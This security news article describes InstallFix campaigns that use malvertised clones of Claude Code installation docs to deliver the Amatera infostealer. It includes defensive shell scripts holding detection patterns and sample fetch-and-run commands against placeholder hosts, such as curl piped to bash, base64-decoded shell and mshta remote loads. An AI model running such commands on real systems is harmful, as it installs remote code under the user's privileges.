
InstallFix Attacks Spread Infostealers via Fake Claude Code Guides


Cybercriminals have launched a new campaign using InstallFix attacks to distribute information-stealing malware through fake Claude Code installation guides. The operation targets developers searching for instructions to install Anthropic’s Claude Code CLI. Instead of legitimate documentation, victims land on convincing clone pages that contain malicious terminal commands.

Security researchers discovered that these pages replicate official documentation almost perfectly. However, the installation instructions have been replaced with commands that silently download and execute infostealer malware. The campaign highlights how attackers increasingly exploit normal developer workflows to compromise systems.

Fake Documentation Pages Trick Developers

Researchers found that attackers created pixel-perfect clones of Claude Code documentation pages. The fake sites reproduce the layout, design, and navigation menus of the real documentation portal. At first glance, they appear completely legitimate.

The attack relies on search visibility. Cybercriminals purchase sponsored advertisements that appear at the top of search results for queries related to Claude Code installation. Users who click these ads are redirected to the fake documentation pages.

Once on the page, victims encounter installation instructions that look identical to legitimate commands. Developers often copy commands directly from documentation without inspecting them closely. The attackers exploit this behavior by embedding malicious instructions inside the copied command.

When the command runs in a terminal, it downloads malware from attacker-controlled servers and executes it on the system.

Malicious Commands Deliver Infostealer Malware

The campaign distributes a malware family known as Amatera Stealer, an information-stealing threat designed to harvest sensitive data from infected systems. Once installed, the malware begins collecting information from browsers and local applications.

The stolen data may include:

  • Stored browser credentials
  • Session cookies and authentication tokens
  • Cryptocurrency wallet information
  • System configuration details

Researchers believe Amatera Stealer evolved from earlier infostealer projects and is distributed through a malware-as-a-service model. This model allows multiple threat actors to deploy the malware in their own campaigns.

The attack also adapts to the victim's operating system. On macOS, the malicious commands are typically encoded instructions that the pasted one-liner decodes and runs in order to download and execute a binary payload, so the visible command reveals little about what it does. On Windows, attackers rely on built-in, Microsoft-signed tools such as mshta.exe, which can fetch and execute an HTML Application straight from a remote URL, so no foreign executable has to be dropped before the stealer itself arrives.
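The command shapes described in this section (the macOS encode-then-decode one-liner and the Windows mshta.exe download) and the curl-pipe-to-shell pattern the article discusses elsewhere are regular enough to flag with a few patterns, either before a pasted line is run or when reviewing command lines collected from developer machines. The classifier below is an added example written for this page, not code from the original article, from the researchers it cites, or from Anthropic. The trusted-host list and every sample command line are constructed placeholders (no real campaign indicators are reproduced), and the host check also catches a URL that hides the real host behind a decoy name and an "@".

```shell
#!/bin/sh
# Added example, not code from the article or from Anthropic: flag the
# InstallFix command shapes described above before a pasted line is run, or
# when reviewing command lines collected from developer machines.
# TRUSTED_HOSTS and every sample command below are constructed placeholders.

# Hosts allowed to serve install scripts. Replace with the real documentation
# host(s) you have verified out of band; anything else is treated as untrusted.
TRUSTED_HOSTS="docs.example.com"

# url_host URL -> lowercase host of an http(s) URL. Strips scheme, path, port
# and any user@ prefix, so "https://docs.example.com@cdn.clone.test/x" yields
# cdn.clone.test, not the decoy name in front of the "@".
url_host() {
    printf '%s\n' "$1" \
      | sed -E 's,^[a-zA-Z]+://([^/?#]+).*,\1,; s,^.*@,,; s,:[0-9]+$,,' \
      | tr 'A-Z' 'a-z'
}

# host_trusted HOST -> exit 0 if HOST is listed in TRUSTED_HOSTS.
host_trusted() {
    for h in $TRUSTED_HOSTS; do
        [ "$h" = "$1" ] && return 0
    done
    return 1
}

# classify_cmd 'COMMAND LINE' -> prints one verdict, most specific first:
#   encoded-shell    base64/xxd-decoded content handed to a shell (macOS variant)
#   lolbin-download  mshta/certutil/bitsadmin/powershell -enc fetching remote content (Windows)
#   untrusted-host   fetches from a host outside TRUSTED_HOSTS (cloned docs page)
#   pipe-to-shell    curl/wget output piped straight into sh/bash/zsh, even from a trusted host
#   ok               none of the above
classify_cmd() {
    cmd=$1
    if printf '%s' "$cmd" | grep -Eqi '(base64[[:space:]]+(-d|--decode)|xxd[[:space:]]+-r)' \
       && printf '%s' "$cmd" | grep -Eq '(^|[^[:alnum:]_.-])(ba|z)?sh([^[:alnum:]_.-]|$)'; then
        echo encoded-shell; return 0
    fi
    if printf '%s' "$cmd" | grep -Eqi '(^|[[:space:]])(mshta(\.exe)?[[:space:]]+[^[:space:]]|certutil(\.exe)?[^|]*-urlcache|bitsadmin(\.exe)?[[:space:]]+/transfer|powershell(\.exe)?[^|]*[[:space:]]-e(c|nc|ncodedcommand)?([[:space:]]|$))'; then
        echo lolbin-download; return 0
    fi
    urls=$(printf '%s' "$cmd" | grep -Eo 'https?://[^[:space:]|"]+' || true)
    for u in $urls; do
        if ! host_trusted "$(url_host "$u")"; then
            echo untrusted-host; return 0
        fi
    done
    if printf '%s' "$cmd" | grep -Eqi '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+(-E[[:space:]]+)?)?(ba|z|da)?sh([[:space:]]|$)'; then
        echo pipe-to-shell; return 0
    fi
    echo ok
}

# Constructed sample command lines, one per line; none points at a real campaign.
SAMPLES='npm install -g some-cli
curl -fsSL https://docs.example.com/install.sh | bash
curl -fsSL https://docs-example-com.clone.test/install.sh | bash
echo aGVsbG8gd29ybGQK | base64 -d | bash
mshta https://cdn.clone.test/update.hta
curl -fsSL https://docs.example.com@cdn.clone.test/install.sh | sh'

printf '%s\n' "$SAMPLES" | while IFS= read -r line; do
    printf '%-16s %s\n' "$(classify_cmd "$line")" "$line"
done
```

A pipe into a shell from a trusted host is still reported, as pipe-to-shell rather than ok, because a compromised or look-alike page is exactly what this campaign relies on; the verdict is a prompt to download and read the script, not a green light. Run the same function over shell history or EDR process command lines to get the monitoring the article recommends.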

InstallFix Exploits Normal Developer Behavior

InstallFix attacks represent a variation of the ClickFix technique that security researchers have tracked in recent campaigns. Traditional ClickFix attacks rely on fake error messages or verification prompts to convince victims to execute commands.

InstallFix campaigns take a different approach. Instead of presenting an error message, attackers disguise malicious commands as legitimate installation instructions.

Developers routinely install tools by copying terminal commands from documentation pages. One-liners of the form curl -fsSL <url> | sh are common in developer workflows: they hand whatever the server returns straight to the shell, with nothing written to disk for review, and run it with the user's privileges (or as root when prefixed with sudo). When the domain in that command is attacker-controlled, the attacker gets immediate arbitrary code execution on the victim's system.

This method requires no phishing email or direct targeting. Simply searching for installation instructions can expose users to the attack.

Malvertising Expands the Reach of the Campaign

Malvertising plays a major role in distributing the fake documentation pages. Sponsored search results often appear above legitimate resources, which increases the likelihood that users will click them first.

The attackers also host their fake pages on well-known infrastructure platforms. Researchers observed sites deployed through services such as content delivery networks and website hosting platforms. These environments can make malicious pages appear more credible and can delay detection.

The combination of search ads, convincing documentation clones, and trusted hosting infrastructure allows attackers to scale the campaign quickly.

Security Measures to Reduce Risk

Developers and system administrators can reduce the risk of InstallFix attacks by following several precautions:

  • Avoid clicking sponsored search results for developer tools.
  • Access documentation through official project websites.
  • Bookmark trusted installation pages.
  • Carefully inspect commands before running them in a terminal: check that every URL in the command points at the official domain, and prefer downloading an install script to a file and reading it over piping curl output straight into a shell.

Security teams should also monitor developer environments for suspicious command execution (curl or wget output piped into a shell, base64-decoded content handed to a shell, mshta.exe launched with a remote URL) and for unexpected downloads from unfamiliar domains.
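The precautions above boil down to one habit: never let the page that served the command also decide what runs. The script below is an added example written for this page, not code from the article or Anthropic's installer, showing a fetch, verify, run flow in POSIX shell that replaces curl | sh. A cloned documentation page that serves a different script then fails the digest check instead of executing. The installer body and the "published" digest are constructed so the demo runs offline; in real use the digest must come from a source you reached independently of the page that served the script, otherwise a clone can publish a matching digest for its own payload.

```shell
#!/bin/sh
# Added example (not from the article, not Anthropic's installer): replace
# "curl URL | sh" with fetch -> digest check -> run, so a script that differs
# from what the project published is refused rather than executed.
# The installer body and digest in demo() are constructed for an offline run.

# sha256_of FILE -> hex SHA-256 of FILE (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# fetch_installer URL DEST -> download to DEST only; HTTPS only, nothing executed.
# Read DEST before running it; this is the step "curl | sh" skips.
fetch_installer() {
    curl -fsSL --proto '=https' -o "$2" "$1"
}

# verify_sha256 FILE EXPECTED -> exit 0 only if FILE's digest equals EXPECTED.
verify_sha256() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# run_verified FILE EXPECTED -> runs FILE with sh only when its digest matches;
# returns 2 and runs nothing on a mismatch.
run_verified() {
    if ! verify_sha256 "$1" "$2"; then
        echo "refusing to run $1: digest does not match the published value" >&2
        return 2
    fi
    sh "$1"
}

# Offline demo with a constructed installer standing in for a downloaded file.
# Returns 0 when the genuine script ran and the tampered copy was refused.
demo() {
    dir=$(mktemp -d)
    printf '%s\n' '#!/bin/sh' 'echo "installer ran"' > "$dir/install.sh"
    published=$(sha256_of "$dir/install.sh")   # stands in for the digest on the official page

    # Genuine script: digest matches, so it runs.
    if ! run_verified "$dir/install.sh" "$published"; then
        rm -rf "$dir"; return 1
    fi

    # Clone page serving a modified script: same name, different bytes.
    printf '%s\n' 'curl -fsSL https://cdn.clone.test/x | sh' >> "$dir/install.sh"
    if run_verified "$dir/install.sh" "$published"; then
        rm -rf "$dir"; return 1   # the tampered copy must never run
    fi
    rm -rf "$dir"
    return 0
}

demo
```

The flow is only as strong as the channel that delivers the expected digest: compare against a value from the project's official site reached via a bookmark or typed URL, or a signed release note, never against a hash printed on the same page that handed you the command.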

Final Thoughts

InstallFix attacks demonstrate how cybercriminals continue adapting social engineering techniques to modern development workflows. Instead of traditional phishing messages, attackers now imitate trusted documentation to trick users into executing malicious commands.

The campaign targeting Claude Code installation guides shows how convincing these attacks can become when they replicate legitimate resources. As developers increasingly rely on online documentation and command-line installation scripts, verifying sources before executing commands becomes critical for maintaining security.

Janet Andersen